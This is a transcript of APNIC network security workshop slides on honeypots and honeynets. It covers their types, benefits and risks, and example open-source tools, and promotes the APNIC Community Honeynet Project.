honeypots & honeynets - wiki.apnictraining.net
TRANSCRIPT
1
Issue Date:
Revision:
Honeypots & Honeynets
Network Security Workshop
30 May 2015
2.0-draft
22
Contents
1. Objectives
2. Definition of Honeypot & Honeynets
3. Benefits & Risk consideration
4. Example of Honeypot tools
5. The Honeynet Project
Credits: David Watson (Honeynet Project) for the some of the contents of this slide [email protected]
33
Know Your Enemy
(Mission Statement, The Honeynet Project)
These days you may be familiar with the term ‘Threat
Intelligence’
To learn the tools, tactics and motives involved in
computer and network attacks, and share the lessons
learned
44
Honeypots in a Nutshell
• Resources (vulnerable) deployed to– Learn about attacks and attackers methodology
• Understand how systems are compromised
• Uncover the attacker’s infrastructure (compromised hosts, networks, C&C servers)
– Capture relevant artifacts – pcaps, malware samples, etc• Could even show vulnerabilities not yet known!
• Lots of open source tools and projects
• Nothing to do with bees or honey ☺
55
The Big Picture
Attacking
Host
[IP Address]
HoneypotPastebin
• Attacking host - bruteforce and gain access
• Downloads malicious script
• Executes malicious script– Honeypot won’t execute the script but we have a
copy of the malware sample• What is the malware doing?
66
Honeypots and Honeynets
• A honeypot is an information system resource whose value
lies in the unauthorized or illicit use of that resource
• Honeypot systems have no production value, so any
activity going to or from a honeypot is likely a probe, attack
or compromise
• A honeynet is simply a network of honeypots
• Information gathering and early warning are the primary
benefits to most organisations
77
Honeypot and Honeynet Types
• Low-Interaction (LI)
– Emulates services, applications and OS’s
– Easier to deploy/maintain, low risk, but only limited information
• High-Interaction (HI)
– Real services, applications and OS’s
– Capture extensive information, but higher risk and time intensive to
maintain
88
Honeypot and Honeynet Types
• Server Honeypots
– Listen for incoming network connections
– Analyse attacks targeting host’s users, services and operating
systems
• Client Honeypots
– Reach out and interact with remote potentially malicious resources
– Have to be instructed where to go to find evil
– Analyse attacks targeting clients and users
9
Honeypot and Honeynet Pros / ConsPros
• Simple Concept
• Collect small data sets of high value
• Few False Positives
• Catch new attacks
• Low False Negatives
• Can beat encryption
• Minimal hardware
• Real time alerting
Cons
• Potentially complex
• Need data analysis
• Only a microscope
• Detection by attackers
• Risk from compromises
• Legal concerns
• False negatives
• Potentially live 24/7
• Operationally intensive
10
APNIC46• APNIC46 Network Security
Workshop Participants deployed 7 honeypots to a cloud service
1111
APNIC46
1212
APNIC46
1313
What can you learn?• Hosts that are trying to connect / scan you
– Potentially already compromised or infected
– such as IP address
• The payload used after successfully gaining access to the honeypot system
• Scripts, binaries/executables etc. – remote control scripts
– malware samples
1414
Why would you want to do this? • By right, you should not expect any real activity or traffic
to/from/in your honeypot
• Detect anomalous activities in your network or system? – Infected / Compromised computers
– Misconfiguration
• Learn about attacks in the wild (research) – Especially if you can scale the deployment
– Attackers and attacker techniques
– Information Sharing opportunities
– Improve overall Security
1515
Some Examples
• Dionaea (Malware) :http://dionaea.carnivore.it/
• Cowrie - SSH & Telnet honeypot : https://github.com/cowrie/cowrie/
• Kippo - SSH honeypot :https://code.google.com/p/kippo/
• Glastopf – Web Honeypot : http://glastopf.org/
• Ghost – USB Honeypot
– https://code.google.com/p/ghost-usb-honeypot/
• Thug – Client Honeypot : https://github.com/buffer/thug
16
APNIC Community Honeynet Project
17
APNIC Community Honeynet Project
• Started in 2015
• Distributed Honeypots*
• Partners mainly in the AP region
• Observe and learn about attacks on the Internet
• Information sharing with APNIC members, CERTs/CSIRTs and Security Community
1818
Learn from actual compromise
• Honeypot used – Cowrie
• Emulate login on port 22 (ssh) and port 23 (telnet)
• Present attacker with file system
• Capture commands and allow attacker to download scripts/binaries (payload)
• Demo:– https://www.fsck.my/viz/kippo-playlog.php
– Check out #2 (manual attack) and #19 (automated attack)
1919
APNIC Community HP
2020
Sensor locations• Tonga
• Samoa
• Malaysia
• Bhutan
• Bangladesh
• Japan
• Australia
2121
Conclusion
• Honeypots are useful for learning about attacks (early warning or research)
• APNIC Community Project– Looking for partners to deploy honeypots
– Collaboration
Contact: [email protected]